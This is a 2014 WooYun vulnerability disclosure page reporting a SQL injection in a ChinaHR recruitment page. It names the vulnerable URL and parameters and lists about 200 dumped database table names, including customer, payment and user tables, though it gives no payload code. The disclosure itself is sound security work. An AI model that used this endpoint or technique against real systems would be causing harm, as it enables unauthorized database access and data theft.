当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059402

漏洞标题:中华英才网(ChinaHR)SQL注入漏洞

相关厂商:中华英才网

漏洞作者: luwikes

提交时间:2014-05-04 23:37

修复时间:2014-06-18 23:38

公开时间:2014-06-18 23:38

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:1

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

好水的

详细说明:

URL:http://pages.chinahr.com/2012/bj/spacechina_0327/jobs.asp?chiMemID=200504010002350134&strMemID=200504010002350005

current.png


dbs.png

漏洞证明:

countForCompany.png


Database: bo
[200 tables]
+--------------------------------------------+
| dbo.Branch |
| dbo.Branch_bak20130518 |
| dbo.Branch_bak20130724 |
| dbo.CanceledCompanies |
| dbo.CanceledCompanyTransit |
| dbo.CheckDmData |
| dbo.ComanySync |
| dbo.Company |
| dbo.CompanyIDMapping |
| dbo.CompanyResourceTransit |
| dbo.CompanyResources |
| dbo.CompanyResourcesApplyLog |
| dbo.CompanyResourcesNameSearch |
| dbo.CompanyXMLFile |
| dbo.CompanyXMLFile_20130822 |
| dbo.ConfirmationForm |
| dbo.ConfirmationFormApprovalInfo |
| dbo.ConfirmationFormAttachment |
| dbo.ConfirmationFormInvoice |
| dbo.ConfirmationFormInvoiceModifyLog |
| dbo.ContractLastTime |
| dbo.CoreSiteDictInfo |
| dbo.CoreSiteJobCategories |
| dbo.CustomerContact |
| dbo.CustomerContactLog |
| dbo.CustomerContactModifyLog |
| dbo.CustomerCreditDegree |
| dbo.CustomerFraudStatus |
| dbo.CustomerIndustries |
| dbo.CustomerIndustries20131119 |
| dbo.CustomerIndustriesTransit |
| dbo.CustomerInfo |
| dbo.CustomerLocalInfo |
| dbo.CustomerLocalInfoTransit |
| dbo.CustomerNameSearch |
| dbo.CustomerQualification |
| dbo.CustomerSalesRelationApplication |
| dbo.CustomerSalesRelationMapping |
| dbo.CustomerSalesRelationMappingLog |
| dbo.CustomerUser |
| dbo.Customers |
| dbo.CustomersBORelation |
| dbo.DBTaskSyncInfo |
| dbo.DMEmailOpenLog |
| dbo.DMErrorEmailList |
| dbo.DMProject |
| dbo.DMQueryUsers |
| dbo.DMTargetUser |
| dbo.DMTargetUserQuery |
| dbo.DMTemplate |
| dbo.DMTemplate_20130301 |
| dbo.DMTemplate_20130523 |
| dbo.Dept |
| dbo.Dept20140124zhangfan |
| dbo.DeptAllSubInfo |
| dbo.DictInfo |
| dbo.DictMapping |
| dbo.EcomLookupChannelEcomProductTypes |
| dbo.EcomLookupEcomProductTypes |
| dbo.EcomLookupOrdersFraudStatuses |
| dbo.EcomLookupProductAttributeTypes |
| dbo.EcomProductAttributeChannelDefaults |
| dbo.EcomProductAttributes |
| dbo.EcomProductDefinitions |
| dbo.EcomProductModifyLog |
| dbo.EcomProductTerms |
| dbo.EcomProductTypeProductAttributes |
| dbo.EcomProductTypeTerm |
| dbo.EcomProducts |
| dbo.EcommContact |
| dbo.EcommContactType |
| dbo.EcommHeaderAttribute |
| dbo.EcommLineAttribute |
| dbo.EcommLineBill |
| dbo.EcommLineBillAttribute |
| dbo.EcommLineBillOpLog |
| dbo.EcommOrderFraudStatus |
| dbo.EcommOrderHeader |
| dbo.EcommOrderLineItem |
| dbo.EcommOrderPromotion |
| dbo.EcommOrderState |
| dbo.EcommOrderStateLog |
| dbo.EcommPaymentInfo |
| dbo.EcommPaymentProcessorType |
| dbo.EcommPaymentType |
| dbo.EcommProfileContact |
| dbo.GoesLocationMapping |
| dbo.ImportantTask |
| dbo.ImportantTaskHistory |
| dbo.InternsZoneCity |
| dbo.InternsZoneCompany |
| dbo.JobCategories |
| dbo.JobCategoriesAndOccupations |
| dbo.JobInfo |
| dbo.JobOCC |
| dbo.KOTSLog |
| dbo.KOTSProductsMapping |
| dbo.Location |
| dbo.LocationJob |
| dbo.LocationMJ |
| dbo.LookupCities |
| dbo.LookupCountries |
| dbo.LookupDetailedCompanySizes |
| dbo.LookupJobCategories |
| dbo.LookupJobTypes |
| dbo.LookupKarmaCompanySizes |
| dbo.LookupMonsterIndustries |
| dbo.LookupStates |
| dbo.LookupYearsExperience |
| dbo.LostAdminStaff |
| dbo.LostCustomer |
| dbo.LostCustomerContact |
| dbo.LostOldStaff |
| dbo.LostPublicArea |
| dbo.LostQualification |
| dbo.LostRelationship |
| dbo.LostTransferApply |
| dbo.MJIndustries |
| dbo.MSpeer_conflictdetectionconfigrequest |
| dbo.MSpeer_conflictdetectionconfigresponse |
| dbo.MSpeer_lsns |
| dbo.MSpeer_originatorid_history |
| dbo.MSpeer_request |
| dbo.MSpeer_response |
| dbo.MSpeer_topologyrequest |
| dbo.MSpeer_topologyresponse |
| dbo.MSpub_identity_range |
| dbo.MailSendLog |
| dbo.MonsterFieldsOfStudy |
| dbo.MonsterIndustry |
| dbo.OpLog |
| dbo.OrderAuditSataus |
| dbo.OrderHeaderInfo |
| dbo.PositionsPosition |
| dbo.PositionsXml |
| dbo.PublicArea |
| dbo.RegionInfo |
| dbo.ReportDownloadLog |
| dbo.RightControllerAction |
| dbo.RightPoint |
| dbo.Role |
| dbo.RoleRight |
| dbo.SMTPServer |
| dbo.SOSCustomerInfo |
| dbo.SStatCompanys |
| dbo.SStatDictInfo |
| dbo.SStatDictMapping |
| dbo.SStatDictMapping_bak |
| dbo.SStatJobs |
| dbo.SStatReports |
| dbo.Salary |
| dbo.SalesReportApply |
| dbo.SalesReportJobs |
| dbo.SerialCodeGenRecord |
| dbo.ShareCode |
| dbo.SpiderReportViewLog |
| dbo.TT |
| dbo.TaskEntry |
| dbo.TaskEntryHistory |
| dbo.TaskMemIDForOrderState |
| dbo.TaskOrderExpiryOrderID |
| dbo.TimeTrackerInfo |
| dbo.UserAndPublicAreaLeader |
| dbo.UserInfo |
| dbo.UserInfo_20121110 |
| dbo.UserLeader |
| dbo.UserLeaderTransit |
| dbo.UserPublicArea |
| dbo.UserRightDept |
| dbo.UserRole |
| dbo.companyidmapping201305201039 |
| dbo.contract |
| dbo.contract_application |
| dbo.csv_data |
| dbo.hxy |
| dbo.job_categories |
| dbo.job_info |
| dbo.job_occ |
| dbo.mem_Industries |
| dbo.mem_docinfo |
| dbo.mem_itemconfig |
| dbo.mem_reginfo |
| dbo.messages |
| dbo.monstercompany |
| dbo.org_info |
| dbo.sysarticlecolumns |
| dbo.sysarticles |
| dbo.sysarticleupdates |
| dbo.sysdiagrams |
| dbo.sysextendedarticlesview |
| dbo.syspublications |
| dbo.sysreplservers |
| dbo.sysschemaarticles |
| dbo.syssubscriptions |
| dbo.systranschemas |
| dbo.tbHost |
| dbo.tempProjectJobContent |
| dbo.temp_mapping |
| dbo.test |
| dbo.user_info |
+--------------------------------------------+
附近还有几个注射点,挺独特

修复方案:

~

版权声明:转载请注明来源 luwikes@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝